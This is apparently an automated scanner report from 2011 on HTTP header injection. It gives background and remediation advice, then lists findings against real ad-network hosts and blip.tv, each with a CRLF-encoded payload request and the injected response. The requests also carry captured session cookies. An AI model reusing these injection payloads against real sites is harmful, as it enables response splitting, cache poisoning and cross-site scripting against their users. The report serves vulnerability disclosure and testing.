Set-Cookie: em=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: fa=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Set-Cookie: et=deleted; expires=Wed, 20-Jan-2010 00:51:50 GMT; path=/; domain=.tuenti.com
Connection: close
Date: Thu, 20 Jan 2011 00:51:51 GMT
Content-Length: 41802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en_US" lang="en_US" xmlns:fw="http://ww
...[SNIP]...

2. HTTP header injection  previous  next
There are 254 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://2822.v.fwmrm.net/ad/l/1 [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://2822.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload 78564%0d%0a92caa119d03 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?s=a116&t=12954824355285936&adid=170504&reid=79402&arid=0&auid=&cn=defaultImpression&et=i&_cc=170504,79402,11811.,11074.11081.11744.11811.,1295482435,1&tpos=0&iw=&uxnw=&uxss=&uxct=&init=1&cr=78564%0d%0a92caa119d03 HTTP/1.1
Host: 2822.v.fwmrm.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; _sc="sg23001.1295482428.1295482477.28800.0.21,"; _auv="g23001~1.1295482477.0,13310.1295482477.0,^"; _uid="a104_5562153497824379009"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _wr="g23001"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 20 Jan 2012 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g23001~1.1295483536.0,13310.1295483536.0,^";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1295483280..60536~60671~66149~103579~170504~173095~306401~,";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg23001.1295482428.1295483536.28800.0.21,";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:32:16 GMT;domain=.fwmrm.net;path=/;
Location: 78564
92caa119d03

Content-Length: 0
Date: Thu, 20 Jan 2011 00:32:16 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209;path=/;httponly


2.2. http://ad.afy11.net/ad [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The value of the c request parameter is copied into the Location response header. The payload d31e9%0d%0a0f93aeeb63f was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /ad?c=EPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ9zsbGZN4CyKa6mnyBGPxQkyumws5Xt6rwuZek5LVXWIZUsD+x8G9fs11dXeU4=!http://a.collective-media.net/jump/cm.martini/;sz=728x90;ord=3271752524?\d31e9%0d%0a0f93aeeb63f HTTP/1.1
Host: ad.afy11.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: f=AgECAAAAAAALqJELwX83TQyokQsDfjdN; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; a=AZ7s9B85IkyRNDgbVDU-vg;

Response

HTTP/1.0 302 Moved Temporarily
Connection: close
Server: AdifyServer
Location: http://a.collective-media.net/jump/cm.martini/;sz=728x90;ord=3271752524?\d31e9
0f93aeeb63f

P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"


2.3. http://ad.doubleclick.net/ad/N5371.150779.COLLECTIVEMEDIA/B5050596.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5371.150779.COLLECTIVEMEDIA/B5050596.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 11f84%0d%0af74fcbd7a68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /11f84%0d%0af74fcbd7a68/N5371.150779.COLLECTIVEMEDIA/B5050596.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/11f84
f74fcbd7a68
/N5371.150779.COLLECTIVEMEDIA/B5050596.3:
Date: Thu, 20 Jan 2011 00:35:35 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adj/cm.martini/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.martini/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 86c2c%0d%0a7595e25e347 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /86c2c%0d%0a7595e25e347/cm.martini/;net=cm;u=,cm-82053649_1295482372,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l;;cmw=owl;sz=728x90;net=cm;ord1=707118;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;ord=3271752524? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/86c2c
7595e25e347
/cm.martini/%3Bnet%3Dcm%3Bu%3D%2Ccm-82053649_1295482372%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D707118%3Bcontx%3Dsports%3Ban%3D40%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.weath_l%3Bord%3D3271752524:
Date: Thu, 20 Jan 2011 00:28:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/click [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c65d%0d%0ab34a39a2892 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c65d%0d%0ab34a39a2892;h=v8/3a95/0/0/%2a/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;~okv=;net=cm;u=,cm-23797598_1295482817,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.weath_l-cm.sports_l;;cmw=owl;sz=160x600;net=cm;ord1=881330;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.weath_l;btg=cm.sports_l;~aopt=3/0/ef/0;~sscs=%3fhttp://www.coloradoski.com/Resorts/Southwest/?utm_source=collective160x60&utm_medium=banner&utm_content=pricepoint&utm_campaign=southwest HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c65d
b34a39a2892
;h=v8/3a95/0/0/*/v;233352718;0-0;3;49633220;2321-160/600;39898763/39916550/1%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-23797598_1295482817%2C11d765b6a10b1b3%2Csports%2Ccm.cm_aa_gn1-cm.weath_l-cm.sports_l%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bn:
Date: Thu, 20 Jan 2011 00:35:33 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.6. http://blip.tv/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 33d4f%0d%0a851ee4bbe60 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /33d4f%0d%0a851ee4bbe60/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/33d4f
851ee4bbe60
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:05 GMT
X-Varnish: 344233096
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/33d4f
851ee4bbe60/">here</a
...[SNIP]...

2.7. http://blip.tv/about/api/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /about/api/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload abf8c%0d%0a91e5c00ccbd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /abf8c%0d%0a91e5c00ccbd/api/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/abf8c
91e5c00ccbd
/api/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 283
Date: Thu, 20 Jan 2011 00:39:08 GMT
X-Varnish: 2146052139
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/abf8c
91e5c00ccbd/api/">her
...[SNIP]...

2.8. http://blip.tv/about/api/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /about/api/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 85f95%0d%0a5539f270833 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /about/85f95%0d%0a5539f270833/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/about/85f95
5539f270833
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 1498223378
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/about/85f95
5539f270833/">h
...[SNIP]...

2.9. http://blip.tv/blogs/list/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /blogs/list/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 43dfc%0d%0ad402f0a3916 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /43dfc%0d%0ad402f0a3916/list/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/43dfc
d402f0a3916
/list/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 299
Date: Thu, 20 Jan 2011 00:39:07 GMT
X-Varnish: 1274888219
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/43dfc
d402f0a3916/list/">he
...[SNIP]...

2.10. http://blip.tv/blogs/list/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /blogs/list/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload ef468%0d%0a5fd4684d734 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /blogs/ef468%0d%0a5fd4684d734/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/blogs/ef468
5fd4684d734
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 285
Date: Thu, 20 Jan 2011 00:39:07 GMT
X-Varnish: 2146051924
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/blogs/ef468
5fd4684d734/">h
...[SNIP]...

2.11. http://blip.tv/careers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /careers/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 88e08%0d%0a14a8636d647 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /88e08%0d%0a14a8636d647/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/88e08
14a8636d647
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 279
Date: Thu, 20 Jan 2011 00:39:09 GMT
X-Varnish: 1498223396
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/88e08
14a8636d647/">here</a
...[SNIP]...

2.12. http://blip.tv/comments/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /comments/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a449%0d%0a7d68a3963a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a449%0d%0a7d68a3963a7/?attached_to=post4658178&skin=rss HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/7a449
7d68a3963a7
/?attached_to=post4658178&skin=rss
Content-Type: text/html; charset=iso-8859-1
Content-Length: 316
Date: Thu, 20 Jan 2011 00:39:05 GMT
X-Varnish: 1498222875
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/7a449
7d68a3963a7/?attached
...[SNIP]...

2.13. http://blip.tv/dashboard [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8acb9%0d%0a3ad848a12d6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8acb9%0d%0a3ad848a12d6 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/8acb9
3ad848a12d6

Content-Type: text/html; charset=iso-8859-1
Content-Length: 293
Date: Thu, 20 Jan 2011 00:38:57 GMT
X-Varnish: 344231869
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/8acb9
3ad848a12d6">here</a>
...[SNIP]...

2.14. http://blip.tv/dashboard/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4b22f%0d%0a6be6c81c81d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4b22f%0d%0a6be6c81c81d/ HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/4b22f
6be6c81c81d
/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 294
Date: Thu, 20 Jan 2011 00:39:01 GMT
X-Varnish: 1248910903
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/4b22f
6be6c81c81d/">here</a
...[SNIP]...

2.15. http://blip.tv/dashboard/ads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ads

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53cde%0d%0aea424158b28 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53cde%0d%0aea424158b28/ads HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/53cde
ea424158b28
/ads
Content-Type: text/html; charset=iso-8859-1
Content-Length: 282
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 1025272120
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/53cde
ea424158b28/ads">here
...[SNIP]...

2.16. http://blip.tv/dashboard/ads [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/ads

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d0a5a%0d%0a6568a4f142f was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/d0a5a%0d%0a6568a4f142f HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/dashboard/d0a5a
6568a4f142f

Content-Type: text/html; charset=iso-8859-1
Content-Length: 303
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 344232288
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/d0a5a
6568a4f142f
...[SNIP]...

2.17. http://blip.tv/dashboard/distribution [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/distribution

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24319%0d%0ad78d94f4998 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24319%0d%0ad78d94f4998/distribution HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/24319
d78d94f4998
/distribution
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 344232175
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/24319
d78d94f4998/distribut
...[SNIP]...

2.18. http://blip.tv/dashboard/distribution [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/distribution

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 69b91%0d%0ae8f1812c081 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /dashboard/69b91%0d%0ae8f1812c081 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/dashboard/69b91
e8f1812c081

Content-Type: text/html; charset=iso-8859-1
Content-Length: 288
Date: Thu, 20 Jan 2011 00:38:59 GMT
X-Varnish: 1248910595
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/dashboard/69b91
e8f1812c081
...[SNIP]...

2.19. http://blip.tv/dashboard/episodes [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /dashboard/episodes

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ca8ba%0d%0a21bce5267e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ca8ba%0d%0a21bce5267e9/episodes HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
